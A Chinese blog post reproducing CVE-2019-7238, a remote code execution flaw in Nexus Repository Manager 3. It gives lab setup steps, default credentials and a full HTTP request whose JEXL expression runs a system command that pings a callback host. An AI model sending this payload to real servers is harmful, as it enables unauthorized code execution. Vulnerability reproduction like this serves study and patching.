Nexus Repository Man
发布时间:2019-08-24 09:33:48编辑:auto阅读(1423)
Nexus Repository Manager 3 RCE CVE-2019-7238
0x00 参考链接
0x01 影响版本
Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本
0x02 复现环境搭建
操作系统: windows 10
nexus版本:Nexus Repository Manager 3.14.0-04
下载链接:
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3
nexus运行需要安装jdk环境,而且jdk需要去oracle下载,openjdk不可以
下载完成后,解压nexus,在nexus-3.14.0-04\bin,执行
nexus.exe /run
直接访问localhost:8081 帐号密码 admin/admin123
0x03漏洞复现
首先需要上传一个资源,而真实环境则不需要,因为真实环境已经上传了assert
然后访问content selectors
抓包修改:
POST /service/extdirect HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 2b482005-c1c3-48b6-942f-70e5a5f6d773
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 398
Cookie: pgv_pvi=5464665088; _ga=GA1.1.452998845.1550474860; _gid=GA1.1.653552585.1550474860; NX-ANTI-CSRF-TOKEN=2b482005-c1c3-48b6-942f-70e5a5f6d773; NXSESSIONID=7bd0f929-d72f-407a-bc17-76c2dd98c6cf
Connection: close
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":11}需要修改的点: {"property":"type","value":"jexl"}
"value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"
上一篇: ntfs-3g
下一篇: [PYTHON] 核心编程笔记之五-Py
- openvpn linux客户端使用
46483
- H3C基本命令大全
44374
- openvpn windows客户端使用
35824
- H3C IRF原理及 配置
33379
- Python exit()函数
28077
- openvpn mac客户端使用
24641
- python全系列官方中文文档
23567
- 1.常用turtle功能函数
18781
- python 获取网卡实时流量
18039
- python 获取Linux和Windows硬件信息
16726
- python3-scipy-ndimage平滑
4548°
- python3-scikit-image平滑去噪
5104°
- python3-PIL非线性噪声平滑
4636°
- python3-Scipy-ndimage进行盒核与高斯核平滑比较
4777°
- python3-PIL高斯模糊滤波器平滑
5439°
- python3-PIL基于盒模糊核均值化平滑
4402°
- python3-PIL线性噪声平滑
4454°
- python3-scikit-image直方图匹配
5002°
- python3-scikit-image对比拉伸和直方图均衡化
4893°
- python3-PIL二值化
6142°
- 姓名:Run
- 职业:谜
- 邮箱:383697894@qq.com
- 定位:上海 · 松江
